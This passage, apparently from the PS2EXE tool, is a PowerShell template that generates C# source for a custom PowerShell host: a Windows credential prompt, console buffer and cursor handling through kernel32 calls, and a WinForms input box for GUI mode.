})\r\n\r\n[assembly:AssemblyTitle(\"$title\")]\r\n[assembly:AssemblyProduct(\"$product\")]\r\n[assembly:AssemblyCopyright(\"$copyright\")]\r\n[assembly:AssemblyTrademark(\"$trademark\")]\r\n$(if (![STRING]::IsNullOrEmpty($version)) {@\"\r\n[assembly:AssemblyVersion(\"$version\")]\r\n[assembly:AssemblyFileVersion(\"$version\")]\r\n\"@ })\r\n// not displayed in details tab of properties dialog, but embedded to file\r\n[assembly:AssemblyDescription(\"$description\")]\r\n[assembly:AssemblyCompany(\"$company\")]\r\n\r\nnamespace 
ik.PowerShell\r\n{\r\n$(if ($noConsole -or $credentialGUI) {@\"\r\n\tinternal class CredentialForm\r\n\t{\r\n\t\t[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]\r\n\t\tprivate struct CREDUI_INFO\r\n\t\t{\r\n\t\t\tpublic int cbSize;\r\n\t\t\tpublic IntPtr hwndParent;\r\n\t\t\tpublic string pszMessageText;\r\n\t\t\tpublic string pszCaptionText;\r\n\t\t\tpublic IntPtr hbmBanner;\r\n\t\t}\r\n\r\n\t\t[Flags]\r\n\t\tenum CREDUI_FLAGS\r\n\t\t{\r\n\t\t\tINCORRECT_PASSWORD = 0x1,\r\n\t\t\tDO_NOT_PERSIST = 0x2,\r\n\t\t\tREQUEST_ADMINISTRATOR = 0x4,\r\n\t\t\tEXCLUDE_CERTIFICATES = 0x8,\r\n\t\t\tREQUIRE_CERTIFICATE = 0x10,\r\n\t\t\tSHOW_SAVE_CHECK_BOX = 0x40,\r\n\t\t\tALWAYS_SHOW_UI = 0x80,\r\n\t\t\tREQUIRE_SMARTCARD = 0x100,\r\n\t\t\tPASSWORD_ONLY_OK = 0x200,\r\n\t\t\tVALIDATE_USERNAME = 0x400,\r\n\t\t\tCOMPLETE_USERNAME = 0x800,\r\n\t\t\tPERSIST = 0x1000,\r\n\t\t\tSERVER_CREDENTIAL = 0x4000,\r\n\t\t\tEXPECT_CONFIRMATION = 0x20000,\r\n\t\t\tGENERIC_CREDENTIALS = 0x40000,\r\n\t\t\tUSERNAME_TARGET_CREDENTIALS = 0x80000,\r\n\t\t\tKEEP_USERNAME = 0x100000,\r\n\t\t}\r\n\r\n\t\tpublic enum CredUIReturnCodes\r\n\t\t{\r\n\t\t\tNO_ERROR = 0,\r\n\t\t\tERROR_CANCELLED = 1223,\r\n\t\t\tERROR_NO_SUCH_LOGON_SESSION = 1312,\r\n\t\t\tERROR_NOT_FOUND = 1168,\r\n\t\t\tERROR_INVALID_ACCOUNT_NAME = 1315,\r\n\t\t\tERROR_INSUFFICIENT_BUFFER = 122,\r\n\t\t\tERROR_INVALID_PARAMETER = 87,\r\n\t\t\tERROR_INVALID_FLAGS = 1004,\r\n\t\t}\r\n\r\n\t\t[DllImport(\"credui\", CharSet = CharSet.Unicode)]\r\n\t\tprivate static extern CredUIReturnCodes CredUIPromptForCredentials(ref CREDUI_INFO creditUR,\r\n\t\t\tstring targetName,\r\n\t\t\tIntPtr reserved1,\r\n\t\t\tint iError,\r\n\t\t\tStringBuilder userName,\r\n\t\t\tint maxUserName,\r\n\t\t\tStringBuilder password,\r\n\t\t\tint maxPassword,\r\n\t\t\t[MarshalAs(UnmanagedType.Bool)] ref bool pfSave,\r\n\t\t\tCREDUI_FLAGS flags);\r\n\r\n\t\tpublic class UserPwd\r\n\t\t{\r\n\t\t\tpublic string User = string.Empty;\r\n\t\t\tpublic string Password 
= string.Empty;\r\n\t\t\tpublic string Domain = string.Empty;\r\n\t\t}\r\n\r\n\t\tinternal static UserPwd PromptForPassword(string caption, string message, string target, string user, PSCredentialTypes credTypes, PSCredentialUIOptions options)\r\n\t\t{\r\n\t\t\t// initialize flags and variables\r\n\t\t\tStringBuilder userPassword = new StringBuilder(), userID = new StringBuilder(user, 128);\r\n\t\t\tCREDUI_INFO credUI = new CREDUI_INFO();\r\n\t\t\tif (!string.IsNullOrEmpty(message)) credUI.pszMessageText = message;\r\n\t\t\tif (!string.IsNullOrEmpty(caption)) credUI.pszCaptionText = caption;\r\n\t\t\tcredUI.cbSize = Marshal.SizeOf(credUI);\r\n\t\t\tbool save = false;\r\n\r\n\t\t\tCREDUI_FLAGS flags = CREDUI_FLAGS.DO_NOT_PERSIST;\r\n\t\t\tif ((credTypes & PSCredentialTypes.Generic) == PSCredentialTypes.Generic)\r\n\t\t\t{\r\n\t\t\t\tflags |= CREDUI_FLAGS.GENERIC_CREDENTIALS;\r\n\t\t\t\tif ((options & PSCredentialUIOptions.AlwaysPrompt) == PSCredentialUIOptions.AlwaysPrompt)\r\n\t\t\t\t{\r\n\t\t\t\t\tflags |= CREDUI_FLAGS.ALWAYS_SHOW_UI;\r\n\t\t\t\t}\r\n\t\t\t}\r\n\r\n\t\t\t// ask the user for the password with a graphical prompt\r\n\t\t\tCredUIReturnCodes returnCode = CredUIPromptForCredentials(ref credUI, target, IntPtr.Zero, 0, userID, 128, userPassword, 128, ref save, flags);\r\n\r\n\t\t\tif (returnCode == CredUIReturnCodes.NO_ERROR)\r\n\t\t\t{\r\n\t\t\t\tUserPwd ret = new UserPwd();\r\n\t\t\t\tret.User = userID.ToString();\r\n\t\t\t\tret.Password = userPassword.ToString();\r\n\t\t\t\tret.Domain = \"\";\r\n\t\t\t\treturn ret;\r\n\t\t\t}\r\n\r\n\t\t\treturn null;\r\n\t\t}\r\n\t}\r\n\"@ })\r\n\r\n\tinternal class PS2EXEHostRawUI : PSHostRawUserInterface\r\n\t{\r\n$(if ($noConsole){ @\"\r\n\t\t// storage for console colors in GUI output; they are read and set but not used at the moment (for future use)\r\n\t\tprivate ConsoleColor ncBackgroundColor = ConsoleColor.White;\r\n\t\tprivate ConsoleColor ncForegroundColor = ConsoleColor.Black;\r\n\"@ } else 
{@\"\r\n\t\tconst int STD_OUTPUT_HANDLE = -11;\r\n\r\n\t\t//CHAR_INFO struct, which was a union in the old days\r\n\t\t// so we want to use LayoutKind.Explicit to mimic it as closely\r\n\t\t// as we can\r\n\t\t[StructLayout(LayoutKind.Explicit)]\r\n\t\tpublic struct CHAR_INFO\r\n\t\t{\r\n\t\t\t[FieldOffset(0)]\r\n\t\t\tinternal char UnicodeChar;\r\n\t\t\t[FieldOffset(0)]\r\n\t\t\tinternal char AsciiChar;\r\n\t\t\t[FieldOffset(2)] //2 bytes seems to work properly\r\n\t\t\tinternal UInt16 Attributes;\r\n\t\t}\r\n\r\n\t\t//COORD struct\r\n\t\t[StructLayout(LayoutKind.Sequential)]\r\n\t\tpublic struct COORD\r\n\t\t{\r\n\t\t\tpublic short X;\r\n\t\t\tpublic short Y;\r\n\t\t}\r\n\r\n\t\t//SMALL_RECT struct\r\n\t\t[StructLayout(LayoutKind.Sequential)]\r\n\t\tpublic struct SMALL_RECT\r\n\t\t{\r\n\t\t\tpublic short Left;\r\n\t\t\tpublic short Top;\r\n\t\t\tpublic short Right;\r\n\t\t\tpublic short Bottom;\r\n\t\t}\r\n\r\n\t\t/* Reads character and color attribute data from a rectangular block of character cells in a console screen buffer,\r\n\t\t\t and the function writes the data to a rectangular block at a specified location in the destination buffer. 
*/\r\n\t\t[DllImport(\"kernel32.dll\", EntryPoint = \"ReadConsoleOutputW\", CharSet = CharSet.Unicode, SetLastError = true)]\r\n\t\tinternal static extern bool ReadConsoleOutput(\r\n\t\t\tIntPtr hConsoleOutput,\r\n\t\t\t/* This pointer is treated as the origin of a two-dimensional array of CHAR_INFO structures\r\n\t\t\twhose size is specified by the dwBufferSize parameter.*/\r\n\t\t\t[MarshalAs(UnmanagedType.LPArray), Out] CHAR_INFO[,] lpBuffer,\r\n\t\t\tCOORD dwBufferSize,\r\n\t\t\tCOORD dwBufferCoord,\r\n\t\t\tref SMALL_RECT lpReadRegion);\r\n\r\n\t\t/* Writes character and color attribute data to a specified rectangular block of character cells in a console screen buffer.\r\n\t\t\tThe data to be written is taken from a correspondingly sized rectangular block at a specified location in the source buffer */\r\n\t\t[DllImport(\"kernel32.dll\", EntryPoint = \"WriteConsoleOutputW\", CharSet = CharSet.Unicode, SetLastError = true)]\r\n\t\tinternal static extern bool WriteConsoleOutput(\r\n\t\t\tIntPtr hConsoleOutput,\r\n\t\t\t/* This pointer is treated as the origin of a two-dimensional array of CHAR_INFO structures\r\n\t\t\twhose size is specified by the dwBufferSize parameter.*/\r\n\t\t\t[MarshalAs(UnmanagedType.LPArray), In] CHAR_INFO[,] lpBuffer,\r\n\t\t\tCOORD dwBufferSize,\r\n\t\t\tCOORD dwBufferCoord,\r\n\t\t\tref SMALL_RECT lpWriteRegion);\r\n\r\n\t\t/* Moves a block of data in a screen buffer. The effects of the move can be limited by specifying a clipping rectangle, so\r\n\t\t\tthe contents of the console screen buffer outside the clipping rectangle are unchanged. 
*/\r\n\t\t[DllImport(\"kernel32.dll\", SetLastError = true)]\r\n\t\tstatic extern bool ScrollConsoleScreenBuffer(\r\n\t\t\tIntPtr hConsoleOutput,\r\n\t\t\t[In] ref SMALL_RECT lpScrollRectangle,\r\n\t\t\t[In] ref SMALL_RECT lpClipRectangle,\r\n\t\t\tCOORD dwDestinationOrigin,\r\n\t\t\t[In] ref CHAR_INFO lpFill);\r\n\r\n\t\t[DllImport(\"kernel32.dll\", SetLastError = true)]\r\n\t\t\tstatic extern IntPtr GetStdHandle(int nStdHandle);\r\n\"@ })\r\n\r\n\t\tpublic override ConsoleColor BackgroundColor\r\n\t\t{\r\n$(if (!$noConsole){ @\"\r\n\t\t\tget\r\n\t\t\t{\r\n\t\t\t\treturn Console.BackgroundColor;\r\n\t\t\t}\r\n\t\t\tset\r\n\t\t\t{\r\n\t\t\t\tConsole.BackgroundColor = value;\r\n\t\t\t}\r\n\"@ } else {@\"\r\n\t\t\tget\r\n\t\t\t{\r\n\t\t\t\treturn ncBackgroundColor;\r\n\t\t\t}\r\n\t\t\tset\r\n\t\t\t{\r\n\t\t\t\tncBackgroundColor = value;\r\n\t\t\t}\r\n\"@ })\r\n\t\t}\r\n\r\n\t\tpublic override System.Management.Automation.Host.Size BufferSize\r\n\t\t{\r\n\t\t\tget\r\n\t\t\t{\r\n$(if (!$noConsole){ @\"\r\n\t\t\t\tif (ConsoleInfo.IsOutputRedirected())\r\n\t\t\t\t\t// return default value for redirection. If no valid value is returned WriteLine will not be called\r\n\t\t\t\t\treturn new System.Management.Automation.Host.Size(120, 50);\r\n\t\t\t\telse\r\n\t\t\t\t\treturn new System.Management.Automation.Host.Size(Console.BufferWidth, Console.BufferHeight);\r\n\"@ } else {@\"\r\n\t\t\t\t\t// return default value for Winforms. 
If no valid value is returned WriteLine will not be called\r\n\t\t\t\treturn new System.Management.Automation.Host.Size(120, 50);\r\n\"@ })\r\n\t\t\t}\r\n\t\t\tset\r\n\t\t\t{\r\n$(if (!$noConsole){ @\"\r\n\t\t\t\tConsole.BufferWidth = value.Width;\r\n\t\t\t\tConsole.BufferHeight = value.Height;\r\n\"@ })\r\n\t\t\t}\r\n\t\t}\r\n\r\n\t\tpublic override Coordinates CursorPosition\r\n\t\t{\r\n\t\t\tget\r\n\t\t\t{\r\n$(if (!$noConsole){ @\"\r\n\t\t\t\treturn new Coordinates(Console.CursorLeft, Console.CursorTop);\r\n\"@ } else {@\"\r\n\t\t\t\t// return a dummy value for Winforms.\r\n\t\t\t\treturn new Coordinates(0, 0);\r\n\"@ })\r\n\t\t\t}\r\n\t\t\tset\r\n\t\t\t{\r\n$(if (!$noConsole){ @\"\r\n\t\t\t\tConsole.CursorTop = value.Y;\r\n\t\t\t\tConsole.CursorLeft = value.X;\r\n\"@ })\r\n\t\t\t}\r\n\t\t}\r\n\r\n\t\tpublic override int CursorSize\r\n\t\t{\r\n\t\t\tget\r\n\t\t\t{\r\n$(if (!$noConsole){ @\"\r\n\t\t\t\treturn Console.CursorSize;\r\n\"@ } else {@\"\r\n\t\t\t\t// return a dummy value for Winforms.\r\n\t\t\t\treturn 25;\r\n\"@ })\r\n\t\t\t}\r\n\t\t\tset\r\n\t\t\t{\r\n$(if (!$noConsole){ @\"\r\n\t\t\t\tConsole.CursorSize = value;\r\n\"@ })\r\n\t\t\t}\r\n\t\t}\r\n\r\n$(if ($noConsole){ @\"\r\n\t\tprivate Form InvisibleForm = null;\r\n\"@ })\r\n\r\n\t\tpublic override void FlushInputBuffer()\r\n\t\t{\r\n$(if (!$noConsole){ @\"\r\n\t\t\tif (!ConsoleInfo.IsInputRedirected())\r\n\t\t\t{\twhile (Console.KeyAvailable)\r\n\t\t\t\t\tConsole.ReadKey(true);\r\n\t\t\t}\r\n\"@ } else {@\"\r\n\t\t\tif (InvisibleForm != null)\r\n\t\t\t{\r\n\t\t\t\tInvisibleForm.Close();\r\n\t\t\t\tInvisibleForm = null;\r\n\t\t\t}\r\n\t\t\telse\r\n\t\t\t{\r\n\t\t\t\tInvisibleForm = new Form();\r\n\t\t\t\tInvisibleForm.Opacity = 0;\r\n\t\t\t\tInvisibleForm.ShowInTaskbar = false;\r\n\t\t\t\tInvisibleForm.Visible = true;\r\n\t\t\t}\r\n\"@ })\r\n\t\t}\r\n\r\n\t\tpublic override ConsoleColor ForegroundColor\r\n\t\t{\r\n$(if (!$noConsole){ @\"\r\n\t\t\tget\r\n\t\t\t{\r\n\t\t\t\treturn 
Console.ForegroundColor;\r\n\t\t\t}\r\n\t\t\tset\r\n\t\t\t{\r\n\t\t\t\tConsole.ForegroundColor = value;\r\n\t\t\t}\r\n\"@ } else {@\"\r\n\t\t\tget\r\n\t\t\t{\r\n\t\t\t\treturn ncForegroundColor;\r\n\t\t\t}\r\n\t\t\tset\r\n\t\t\t{\r\n\t\t\t\tncForegroundColor = value;\r\n\t\t\t}\r\n\"@ })\r\n\t\t}\r\n\r\n\t\tpublic override BufferCell[,] GetBufferContents(System.Management.Automation.Host.Rectangle rectangle)\r\n\t\t{\r\n$(if ($compiler20) {@\"\r\n\t\t\tthrow new Exception(\"Method GetBufferContents not implemented for .Net V2.0 compiler\");\r\n\"@ } else { if (!$noConsole) {@\"\r\n\t\t\tIntPtr hStdOut = GetStdHandle(STD_OUTPUT_HANDLE);\r\n\t\t\tCHAR_INFO[,] buffer = new CHAR_INFO[rectangle.Bottom - rectangle.Top + 1, rectangle.Right - rectangle.Left + 1];\r\n\t\t\tCOORD buffer_size = new COORD() {X = (short)(rectangle.Right - rectangle.Left + 1), Y = (short)(rectangle.Bottom - rectangle.Top + 1)};\r\n\t\t\tCOORD buffer_index = new COORD() {X = 0, Y = 0};\r\n\t\t\tSMALL_RECT screen_rect = new SMALL_RECT() {Left = (short)rectangle.Left, Top = (short)rectangle.Top, Right = (short)rectangle.Right, Bottom = (short)rectangle.Bottom};\r\n\r\n\t\t\tReadConsoleOutput(hStdOut, buffer, buffer_size, buffer_index, ref screen_rect);\r\n\r\n\t\t\tSystem.Management.Automation.Host.BufferCell[,] ScreenBuffer = new System.Management.Automation.Host.BufferCell[rectangle.Bottom - rectangle.Top + 1, rectangle.Right - rectangle.Left + 1];\r\n\t\t\tfor (int y = 0; y <= rectangle.Bottom - rectangle.Top; y++)\r\n\t\t\t\tfor (int x = 0; x <= rectangle.Right - rectangle.Left; x++)\r\n\t\t\t\t{\r\n\t\t\t\t\tScreenBuffer[y,x] = new System.Management.Automation.Host.BufferCell(buffer[y,x].AsciiChar, (System.ConsoleColor)(buffer[y,x].Attributes & 0xF), (System.ConsoleColor)((buffer[y,x].Attributes & 0xF0) / 0x10), System.Management.Automation.Host.BufferCellType.Complete);\r\n\t\t\t\t}\r\n\r\n\t\t\treturn ScreenBuffer;\r\n\"@ } else {@\"\r\n\t\t\tSystem.Management.Automation.Host.BufferCell[,] 
ScreenBuffer = new System.Management.Automation.Host.BufferCell[rectangle.Bottom - rectangle.Top + 1, rectangle.Right - rectangle.Left + 1];\r\n\r\n\t\t\tfor (int y = 0; y <= rectangle.Bottom - rectangle.Top; y++)\r\n\t\t\t\tfor (int x = 0; x <= rectangle.Right - rectangle.Left; x++)\r\n\t\t\t\t{\r\n\t\t\t\t\tScreenBuffer[y,x] = new System.Management.Automation.Host.BufferCell(' ', ncForegroundColor, ncBackgroundColor, System.Management.Automation.Host.BufferCellType.Complete);\r\n\t\t\t\t}\r\n\r\n\t\t\treturn ScreenBuffer;\r\n\"@ } })\r\n\t\t}\r\n\r\n\t\tpublic override bool KeyAvailable\r\n\t\t{\r\n\t\t\tget\r\n\t\t\t{\r\n$(if (!$noConsole) {@\"\r\n\t\t\t\treturn Console.KeyAvailable;\r\n\"@ } else {@\"\r\n\t\t\t\treturn true;\r\n\"@ })\r\n\t\t\t}\r\n\t\t}\r\n\r\n\t\tpublic override System.Management.Automation.Host.Size MaxPhysicalWindowSize\r\n\t\t{\r\n\t\t\tget\r\n\t\t\t{\r\n$(if (!$noConsole){ @\"\r\n\t\t\t\treturn new System.Management.Automation.Host.Size(Console.LargestWindowWidth, Console.LargestWindowHeight);\r\n\"@ } else {@\"\r\n\t\t\t\t// dummy value for Winforms\r\n\t\t\t\treturn new System.Management.Automation.Host.Size(240, 84);\r\n\"@ })\r\n\t\t\t}\r\n\t\t}\r\n\r\n\t\tpublic override System.Management.Automation.Host.Size MaxWindowSize\r\n\t\t{\r\n\t\t\tget\r\n\t\t\t{\r\n$(if (!$noConsole){ @\"\r\n\t\t\t\t// height of the size comes from BufferHeight, not BufferWidth\r\n\t\t\t\treturn new System.Management.Automation.Host.Size(Console.BufferWidth, Console.BufferHeight);\r\n\"@ } else {@\"\r\n\t\t\t\t// dummy value for Winforms\r\n\t\t\t\treturn new System.Management.Automation.Host.Size(120, 84);\r\n\"@ })\r\n\t\t\t}\r\n\t\t}\r\n\r\n\t\tpublic override KeyInfo ReadKey(ReadKeyOptions options)\r\n\t\t{\r\n$(if (!$noConsole) {@\"\r\n\t\t\tConsoleKeyInfo cki = Console.ReadKey((options & ReadKeyOptions.NoEcho)!=0);\r\n\r\n\t\t\tControlKeyStates cks = 0;\r\n\t\t\tif ((cki.Modifiers & ConsoleModifiers.Alt) != 0)\r\n\t\t\t\tcks |= ControlKeyStates.LeftAltPressed | ControlKeyStates.RightAltPressed;\r\n\t\t\tif ((cki.Modifiers & 
ConsoleModifiers.Control) != 0)\r\n\t\t\t\tcks |= ControlKeyStates.LeftCtrlPressed | ControlKeyStates.RightCtrlPressed;\r\n\t\t\tif ((cki.Modifiers & ConsoleModifiers.Shift) != 0)\r\n\t\t\t\tcks |= ControlKeyStates.ShiftPressed;\r\n\t\t\tif (Console.CapsLock)\r\n\t\t\t\tcks |= ControlKeyStates.CapsLockOn;\r\n\t\t\tif (Console.NumberLock)\r\n\t\t\t\tcks |= ControlKeyStates.NumLockOn;\r\n\r\n\t\t\treturn new KeyInfo((int)cki.Key, cki.KeyChar, cks, (options & ReadKeyOptions.IncludeKeyDown)!=0);\r\n\"@ } else {@\"\r\n\t\t\tif ((options & ReadKeyOptions.IncludeKeyDown)!=0)\r\n\t\t\t\treturn ReadKeyBox.Show(\"\", \"\", true);\r\n\t\t\telse\r\n\t\t\t\treturn ReadKeyBox.Show(\"\", \"\", false);\r\n\"@ })\r\n\t\t}\r\n\r\n\t\tpublic override void ScrollBufferContents(System.Management.Automation.Host.Rectangle source, Coordinates destination, System.Management.Automation.Host.Rectangle clip, BufferCell fill)\r\n\t\t{ // no destination block clipping implemented\r\n$(if (!$noConsole) { if ($compiler20) {@\"\r\n\t\t\tthrow new Exception(\"Method ScrollBufferContents not implemented for .Net V2.0 compiler\");\r\n\"@ } else {@\"\r\n\t\t\t// clip area out of source range?\r\n\t\t\tif ((source.Left > clip.Right) || (source.Right < clip.Left) || (source.Top > clip.Bottom) || (source.Bottom < clip.Top))\r\n\t\t\t{ // clipping out of range -> nothing to do\r\n\t\t\t\treturn;\r\n\t\t\t}\r\n\r\n\t\t\tIntPtr hStdOut = GetStdHandle(STD_OUTPUT_HANDLE);\r\n\t\t\tSMALL_RECT lpScrollRectangle = new SMALL_RECT() {Left = (short)source.Left, Top = (short)source.Top, Right = (short)(source.Right), Bottom = (short)(source.Bottom)};\r\n\t\t\tSMALL_RECT lpClipRectangle;\r\n\t\t\tif (clip != null)\r\n\t\t\t{ lpClipRectangle = new SMALL_RECT() {Left = (short)clip.Left, Top = (short)clip.Top, Right = (short)(clip.Right), Bottom = (short)(clip.Bottom)}; }\r\n\t\t\telse\r\n\t\t\t{ lpClipRectangle = new SMALL_RECT() {Left = (short)0, Top = (short)0, Right = (short)(Console.WindowWidth - 1), Bottom = 
(short)(Console.WindowHeight - 1)}; }\r\n\t\t\tCOORD dwDestinationOrigin = new COORD() {X = (short)(destination.X), Y = (short)(destination.Y)};\r\n\t\t\tCHAR_INFO lpFill = new CHAR_INFO() { AsciiChar = fill.Character, Attributes = (ushort)((int)(fill.ForegroundColor) + (int)(fill.BackgroundColor)*16) };\r\n\r\n\t\t\tScrollConsoleScreenBuffer(hStdOut, ref lpScrollRectangle, ref lpClipRectangle, dwDestinationOrigin, ref lpFill);\r\n\"@ } })\r\n\t\t}\r\n\r\n\t\tpublic override void SetBufferContents(System.Management.Automation.Host.Rectangle rectangle, BufferCell fill)\r\n\t\t{\r\n$(if (!$noConsole){ @\"\r\n\t\t\t// using a trick: move the buffer out of the screen, the source area gets filled with the char fill.Character\r\n\t\t\tif (rectangle.Left >= 0)\r\n\t\t\t\tConsole.MoveBufferArea(rectangle.Left, rectangle.Top, rectangle.Right-rectangle.Left+1, rectangle.Bottom-rectangle.Top+1, BufferSize.Width, BufferSize.Height, fill.Character, fill.ForegroundColor, fill.BackgroundColor);\r\n\t\t\telse\r\n\t\t\t{ // Clear-Host: move all content off the screen\r\n\t\t\t\tConsole.MoveBufferArea(0, 0, BufferSize.Width, BufferSize.Height, BufferSize.Width, BufferSize.Height, fill.Character, fill.ForegroundColor, fill.BackgroundColor);\r\n\t\t\t}\r\n\"@ })\r\n\t\t}\r\n\r\n\t\tpublic override void SetBufferContents(Coordinates origin, BufferCell[,] contents)\r\n\t\t{\r\n$(if (!$noConsole) { if ($compiler20) {@\"\r\n\t\t\tthrow new Exception(\"Method SetBufferContents not implemented for .Net V2.0 compiler\");\r\n\"@ } else {@\"\r\n\t\t\tIntPtr hStdOut = GetStdHandle(STD_OUTPUT_HANDLE);\r\n\t\t\tCHAR_INFO[,] buffer = new CHAR_INFO[contents.GetLength(0), contents.GetLength(1)];\r\n\t\t\tCOORD buffer_size = new COORD() {X = (short)(contents.GetLength(1)), Y = (short)(contents.GetLength(0))};\r\n\t\t\tCOORD buffer_index = new COORD() {X = 0, Y = 0};\r\n\t\t\tSMALL_RECT screen_rect = new SMALL_RECT() {Left = (short)origin.X, Top = (short)origin.Y, Right = (short)(origin.X + 
contents.GetLength(1) - 1), Bottom = (short)(origin.Y + contents.GetLength(0) - 1)};\r\n\r\n\t\t\tfor (int y = 0; y < contents.GetLength(0); y++)\r\n\t\t\t\tfor (int x = 0; x < contents.GetLength(1); x++)\r\n\t\t\t\t{\r\n\t\t\t\t\tbuffer[y,x] = new CHAR_INFO() { AsciiChar = contents[y,x].Character, Attributes = (ushort)((int)(contents[y,x].ForegroundColor) + (int)(contents[y,x].BackgroundColor)*16) };\r\n\t\t\t\t}\r\n\r\n\t\t\tWriteConsoleOutput(hStdOut, buffer, buffer_size, buffer_index, ref screen_rect);\r\n\"@ } })\r\n\t\t}\r\n\r\n\t\tpublic override Coordinates WindowPosition\r\n\t\t{\r\n\t\t\tget\r\n\t\t\t{\r\n\t\t\t\tCoordinates s = new Coordinates();\r\n$(if (!$noConsole){ @\"\r\n\t\t\t\ts.X = Console.WindowLeft;\r\n\t\t\t\ts.Y = Console.WindowTop;\r\n\"@ } else {@\"\r\n\t\t\t\t// dummy value for Winforms\r\n\t\t\t\ts.X = 0;\r\n\t\t\t\ts.Y = 0;\r\n\"@ })\r\n\t\t\t\treturn s;\r\n\t\t\t}\r\n\t\t\tset\r\n\t\t\t{\r\n$(if (!$noConsole){ @\"\r\n\t\t\t\tConsole.WindowLeft = value.X;\r\n\t\t\t\tConsole.WindowTop = value.Y;\r\n\"@ })\r\n\t\t\t}\r\n\t\t}\r\n\r\n\t\tpublic override System.Management.Automation.Host.Size WindowSize\r\n\t\t{\r\n\t\t\tget\r\n\t\t\t{\r\n\t\t\t\tSystem.Management.Automation.Host.Size s = new System.Management.Automation.Host.Size();\r\n$(if (!$noConsole){ @\"\r\n\t\t\t\ts.Height = Console.WindowHeight;\r\n\t\t\t\ts.Width = Console.WindowWidth;\r\n\"@ } else {@\"\r\n\t\t\t\t// dummy value for Winforms\r\n\t\t\t\ts.Height = 50;\r\n\t\t\t\ts.Width = 120;\r\n\"@ })\r\n\t\t\t\treturn s;\r\n\t\t\t}\r\n\t\t\tset\r\n\t\t\t{\r\n$(if (!$noConsole){ @\"\r\n\t\t\t\tConsole.WindowWidth = value.Width;\r\n\t\t\t\tConsole.WindowHeight = value.Height;\r\n\"@ })\r\n\t\t\t}\r\n\t\t}\r\n\r\n\t\tpublic override string WindowTitle\r\n\t\t{\r\n\t\t\tget\r\n\t\t\t{\r\n$(if (!$noConsole){ @\"\r\n\t\t\t\treturn Console.Title;\r\n\"@ } else {@\"\r\n\t\t\t\treturn System.AppDomain.CurrentDomain.FriendlyName;\r\n\"@ })\r\n\t\t\t}\r\n\t\t\tset\r\n\t\t\t{\r\n$(if 
(!$noConsole){ @\"\r\n\t\t\t\tConsole.Title = value;\r\n\"@ })\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\r\n$(if ($noConsole){ @\"\r\n\tpublic class InputBox\r\n\t{\r\n\t\t[DllImport(\"user32.dll\", CharSet = CharSet.Unicode, CallingConvention = CallingConvention.Cdecl)]\r\n\t\tprivate static extern IntPtr MB_GetString(uint strId);\r\n\r\n\t\tpublic static DialogResult Show(string sTitle, string sPrompt, ref string sValue, bool bSecure)\r\n\t\t{\r\n\t\t\t// Generate controls\r\n\t\t\tForm form = new Form();\r\n\t\t\tform.AutoScaleDimensions = new System.Drawing.SizeF(6F, 13F);\r\n\t\t\tform.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font;\r\n\t\t\tLabel label = new Label();\r\n\t\t\tTextBox textBox = new TextBox();\r\n\t\t\tButton buttonOk = new Button();\r\n\t\t\tButton buttonCancel = new Button();\r\n\r\n\t\t\t// Sizes and positions are defined according to the label\r\n\t\t\t// This control has to be finished first\r\n\t\t\tif (string.IsNullOrEmpty(sPrompt))\r\n\t\t\t{\r\n\t\t\t\tif (bSecure)\r\n\t\t\t\t\tlabel.Text = \"Secure input:   \";\r\n\t\t\t\telse\r\n\t\t\t\t\tlabel.Text = \"Input:          \";\r\n\t\t\t}\r\n\t\t\telse\r\n\t\t\t\tlabel.Text = sPrompt;\r\n\t\t\tlabel.Location = new Point(9, 19);\r\n\t\t\tlabel.MaximumSize = new System.Drawing.Size(System.Windows.Forms.Screen.FromControl(form).Bounds.Width*5/8 - 18, 0);\r\n\t\t\tlabel.AutoSize = true;\r\n\t\t\t// Size of the label is defined not before Add()\r\n\t\t\tform.Controls.Add(label);\r\n\r\n\t\t\t// Generate textbox\r\n\t\t\tif (bSecure) textBox.UseSystemPasswordChar = true;\r\n\t\t\ttextBox.Text = sValue;\r\n\t\t\ttextBox.SetBounds(12, label.Bottom, label.Right - 12, 20);\r\n\r\n\t\t\t// Generate buttons\r\n\t\t\t// get localized \"OK\"-string\r\n\t\t\tstring sTextOK = Marshal.PtrToStringUni(MB_GetString(0));\r\n\t\t\tif (string.IsNullOrEmpty(sTextOK))\r\n\t\t\t\tbuttonOk.Text = \"OK\";\r\n\t\t\telse\r\n\t\t\t\tbuttonOk.Text = sTextOK;\r\n\r\n\t\t\t// get localized \"Cancel\"-string\r\n\t\t\tstring 
sTextCancel = Marshal.PtrToStringUni(MB_GetString(1));\r\n\t\t\tif (string.IsNullOrEmpty(sTextCancel))\r\n\t\t\t\tbuttonCancel.Text = \"Cancel\";\r\n\t\t\telse\r\n\t\t\t\tbuttonCancel.Text = sTextCancel;\r\n\r\n\t\t\tbuttonOk.DialogResult = DialogResult.OK;\r\n\t\t\tbuttonCancel.DialogResult = DialogResult.Cancel;\r\n\t\t\tbuttonOk.SetBounds(System.Math.Max(12, label.Right - 158), label.Bottom + 36, 75, 23);\r\n\t\t\tbuttonCancel.SetBounds(System.Math.Max(93, label.Right - 77), label.Bottom + 36, 75, 23);\r\n\r\n\t\t\t// Configure form\r\n\t\t\tif (string.IsNullOrEmpty(sTitle))\r\n\t\t\t\tform.Text = System.AppDomain.CurrentDomain.FriendlyName;\r\n\t\t\telse\r\n\t\t\t\tform.Text = sTitle;\r\n\t\t\tform.ClientSize = new System.Drawing.Size(System.Math.Max(178, label.Right + 10), label.Bottom + 71);\r\n\t\t\tform.Controls.AddRange(new Control[] { textBox, buttonOk, buttonCancel });\r\n\t\t\tform.FormBorderStyle = FormBorderStyle.FixedDialog;\r\n\t\t\tform.StartPosition = FormStartPosition.CenterScreen;\r\n\t\t\ttry {\r\n\t\t\t\tform.Icon = Icon.ExtractAssociatedIcon(Assembly.GetExecutingAssembly().Location);\r\n\t\t\t}\r\n\t\t\tcatch\r\n\t\t\t{ }\r\n\t\t\tform.MinimizeBox = false;\r\n\t\t\tform.MaximizeBox = false;\r\n\t\t\tform.AcceptButton = buttonOk;\r\n\t\t\tform.CancelButton = buttonCancel;\r\n\r\n\t\t\t// Show form and compute results\r\n\t\t\tDialogResult dialogResult = form.ShowDialog();\r\n\t\t\tsValue = textBox.Text;\r\n\t\t\treturn dialogResult;\r\n\t\t}\r\n\r\n\t\tpublic static DialogResult Show(string sTitle, string sPrompt, ref string sValue)\r\n\t\t{\r\n\t\t\treturn Show(sTitle, sPrompt, ref sValue, false);\r\n\t\t}\r\n\t}\r\n\r\n\tpublic class 